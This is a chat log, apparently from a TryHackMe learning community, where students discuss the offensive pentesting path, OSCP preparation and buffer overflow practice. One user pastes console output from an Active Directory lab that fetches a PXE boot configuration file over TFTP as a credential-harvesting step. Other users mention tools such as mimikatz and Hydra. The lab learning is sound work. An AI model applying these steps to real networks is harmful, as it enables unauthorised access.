Daniel Lowrie is a great teacher in this domain. You could seek out his stuff like "Hands-on Hacking" cuz he'll breach machines from VulnHub explaining every step like enumeration (there is no "after enumeration part" as it's a continuous process during a pentest). You can even follow along if you want to by downloading the same machine. IT ProTV is where I saw that particular series btw, but there are many free resources. The overall message is enumerate, enumerate, enumerate lol
thnx man 🙂
Listen, someone tell me: is DATA STRUCTURES AND ALGORITHMS necessary up to competitive level in the cyber security field?
yup
Hello everyone, where can I download Immunity Debugger?
why session is not valid ?
Hi all. A question from a noob who has gone through the Pre-Security, Cyber Sec. 101 and Jr. Penetration Tester: I see that some of the first rooms here (in Offensive Pentesting) require (or recommend, at least) using Metasploit. In contrast, I was recommended not using this tool to avoid becoming a script kiddie. What's your opinion? Maybe using it for these rooms is worth it at this point of the career?
Absolutely use it. If there's an existing module available for a vuln it makes sense to utilize it. The alternative I think you're referencing is creating your own POCs.
What I would highly recommend when you find a vulnerability in a room is research the vulnerability. What type of vuln is it? How is it exploited? How does the exploit you found take advantage of it?
Next, comb through the POC or metasploit module code to understand what's occurring. This is good practice especially when you find POCs online because you don't just want to run something without knowing what it does.
Familiarizing yourself with python syntax is a good start because many exploits are written in python and metasploit modules are written in ruby which is legible if you know python.
Hope it helps.
Sure it helps! Thanks!
Gave +1 Rep to @white flame (current: #149 - 71)
Eyo, i think I am experiencing a bug.
Is someone available for a question?
Anybody else experiences a bug in Breaching Active Directory task 6?
Trying to tftp to the MDT server, but I get "connect request failed" every time, and no matter how much I'm trying to debug it I can't seem to find the problem!
Adding a screenshot of the debugging and the bug:
Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.
thm@THMJMP1 C:\Users\thm>ping 10.200.70.202
Pinging 10.200.70.202 with 32 bytes of data:
Reply from 10.200.70.202: bytes=32 time<1ms TTL=128
Reply from 10.200.70.202: bytes=32 time<1ms TTL=128
Ping statistics for 10.200.70.202:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Control-C
^C
thm@THMJMP1 C:\Users\thm>nslookup thmmdt.za.tryhackme.com
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 10.200.70.101
DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
Name: thmmdt.za.tryhackme.com
Address: 10.200.70.202
thm@THMJMP1 C:\Users\thm>tftp -i 10.200.70.202 GET "\Tmp\x64{B2C8C206-3AAA-4E25-9E9B-17E78C423EE5}.bcd" conf.bcd
Connect request failed
Greetings All! I just wanted to make a suggestion. I've recently decided I'm going more purple and have started on some Blue Team stuff. I'm seeing training on writing reports and that sort of stuff. I'd like to recommend that be added to the pen testing path as well. Note taking, report writing etc.
Try to create an entry for it in #feedback-and-ideas
I found it. Thank you.
anyone able to help me out with some issues with bloodhound?
What's the issue 🙂 ?
Managed to sort it now
Hello. I am facing the same issue. Could you solve that? If yes, can you tell how?
Hi, honestly I'm new to all this and I want to know how I can learn the basics and keep leveling up; I learn fast.
Hey 39, this is an english only server please. Thanks!
Gave +1 Rep to @quasi lintel (current: #3695 - 1)
What's the matter, 39, doesn't that seem fine to you?
Guys, I am confused when I'm trying to gain root access after finding the setImpersonator is enabled
Why is it called the offensive pentesting path? Is there a defensive pentesting path?
Defensive pentesting is called Purple-teaming (testing your own defenses/alerts/monitoring)
Guys, I have completed till Jr Penetration Tester and Web Fundamentals (difficulty: easy), so should I shift to HackTheBox and start doing the CPTS path, or complete the THM modules till Red Team and then shift to HTB?
It's up to you. You can also try jumping into the CPTS learning path to get a feel of how HTB teaches the concepts and see if it works for you this early.
Can someone tell me what all offensive pentesting room in THM covers?
Facing the below error when submitting a question for Offensive Security Intro
Oops, this page failed to load
Something went wrong while loading this page. Try refreshing to give it another shot.
Error ID:
fb02b22a9ad149488db4af69a6c2e1f4
please help
help
not specific to this path - #room-help was the right spot for your post
You need to give some command
Usage: yum [options] COMMAND
I get this message in Daily Bugle room of Offensive security path for GTFOBins of yum
All the rooms focus on Recon to Privilege Escalation. Mainly for practicing what you learnt in previous learning paths.
According to me you should complete Offensive Pentesting and Red Team then shift to HTB for CPTS
very good
HackPark is annoying me though lol
@real sandal Why
Hydra kept saying all the passwords in my wordlist were valid… couldn’t figure that out so just got in through wfuzz (I don’t really like hydra for http anyway)
Now trying to get the RCE to work… not returning a shell like I expected so have to do more digging
just got to read the exploit
can you paste the command you're using?
@real sandal
@alpine peak You made this OSCP path?
Damn, this needs to be tried then.
Good job, though.
Oh wow
6 months is a lot of time.
VulnHub and THM stuff back and forth
😢 Didn't realise how much of this I'd passively done. Gj on the path tho man! It looks sick
I feel more motivated to create a Binary related room and eventually a path.
I feel that Robin!
I'd love to do a bug hunting one but I really don't have the motivation to develop so many web apps
The custom-written ones take the most time
Is one of those non-added machines Brainpan? Noticed the room is private
GameZone, Alcatraz, Vulnversity, brainstorm is custom written
I forgot what else was
I made Brainstorm, brainpan was from VulnHub, and it's using wine to simulate exploiting a windows BOF
@real sandal Non-added machines are Jack and Alcatraz
Alcatraz is out of scope of the OSCP tho, since the concepts are more elaborate than typical CVE
Ah
Wait, brainpan is a Linux machine with windows binary as a vulnerable point?
Yes because VulnHub is not legally allowed to distribute windows
Yes many times
On an actual windows machine
If I remember correctly, OSCP doesn't involve complex buffer overflow challenges, right? I haven't taken it but I've heard of this.
They really want you to know how to find bad chars
I get nervous talking about the exam so that's all I will say about it
shiet
You just got to learn to look at the execution of the shellcode one by one and find the specific part where the execution messes up, because doing the traditional way did not help me
You have any binary close to what you're talking about?
oscp terrifies me, I've gone to the payment screen like 5 times in the last few months but every time feel I know nothing and should just give up 😂
pog
I can try making one...but not exactly same
Lol
Happens, be prepared enough. @final vault
My exam is in 2 weeks 😬
I thought the same also about the BOF, its easy but they try anything they can for it not to be that easy, It could have changed since I did it
Oh, good luck.
2 weeks = 24*14 = 336
Considering you have to adjust some sleep, let it 6 hours then
336 - 84 = 252
That means, you have 252 hours. Adjust everything. @real sandal
If you know the process and understand what's happening with it, I guess the debugging process won't take time, right? @alpine peak
People who go into the oscp exam trying to just push through 24 hours of hacking are silly. Better to focus your time get a decent 8 hours before and take a nap through it
Ha lately I've been feeling like I’ve slept too much and haven’t put in enough nights popping shells
Yea, just understand whats going on, and be really good at finding bad chars for shellcode generation
Fair enough, guess it's not that hard as we are considering it.
It may be a longer trial and error process than expected but you will get it if you keep trying
It just depends if they changed it or not
But ¯\_(ツ)_/¯ , then hell. I'm gonna make my room hard
The BOF part is still the easiest part of the exam
D:
So don't overthink it
you kidding
For me it was
The Windows privesc part is what I had trouble with because I did VulnHub all the time
Nani?
Windows, I don't hate it. But using Linux all day I feel like an outcast lol. @final vault
Windows privesc is fun if you have knowledge of it, but at the time I had this idea that it wasn't useful but I was completely wrong because most of pentesting is windows
I get that, I just love some of the creative stuff you can do with active directory
9/10 it's a misconfiguration which leads to NT AUTH
mimikatz and powerview
I feel people just focus too heavily on Linux and ignore windows
At least, I can say the BOFs won't be like Jigsaw 2's root part.
Was jigsaw2 privesc hard?
Yea, if you have ippsec, it's pretty easy
man if you guys play on htb at all I can't recommend doing resolute enough!
People actually did jigsaw2 wrong, because I didn't remove LXD group
The point was only adding a setuid(0) which was easier since libc is known and you had the gadgets.
I did it the intended way.
Good
That's why I like Debian, because Ubuntu will add useless services by default that may or may not be vulnerable
It's hard to go to windows when you're spoiled by how efficient linux is with administration
@alpine peak Umm, which Brainpan had that windows BOF?
Brainpan:1
Just started this path today. How is it so far with you guys?
I've just done blue and kenobi
Ey, how you finding it?
Good so far.
Amazing, feedback is always appreciated https://TryHackMe.com/feedback
Aha, on my phone
Glad to see something like this appear. I know everyone says HTB and Ippsec which are awesome. But this seems more.... structured I guess.
HTB won't accept OSCP targeted machines anymore
Oh why?
Their standards of difficulty are higher
Like Easy machines are actually medium on other platforms. They seem to only accept concepts that haven't been explored unless the founder of HTB makes it
Oh, next they'll do their own cert
They already do
Ohh yeah
HTB has a massive power creep issue
The cert is not valued in the market currently tho
Boxes are just slowly getting harder and harder and the ratings trickle down
Hard becomes medium, medium becomes easy, etc
Yea, that's what I've always noticed
Eventually HTB will be forced to accept recycled concepts because there is nothing else to explore
Yeah interesting.
By that point it will be new to the active user group though
If their goal is the ranking system
I just know HTB did not prepare me for what I experienced with offsec's proving grounds
Yeah, I want TryHackMe to ease beginners into security, but then provide rooms for more advanced concepts
Yea, still working on adding required concepts for that goal
Almost done Skynet. Fun box just need to root it tonight
Maybe I’ll play the Terminator 2 title music during it 🙂
Aha, themed music for a themed box
Terminator 2 the best 
I perfected the smug dance
@real sandal Can't promise but if you need help with buffer overflow, you can hmu anytime.
Cool, I definitely still need to put in more reps with BoF
tbh, since I started on HTB, I've never encountered a type of attack that was recycled
they really are picky about the boxes they are releasing
@real sandal I'll help you out, don't worry. You gonna do great.
Well Yea, you can actually see the amount of boxes they reject
too bad on the last few boxes there were issues regarding unintended paths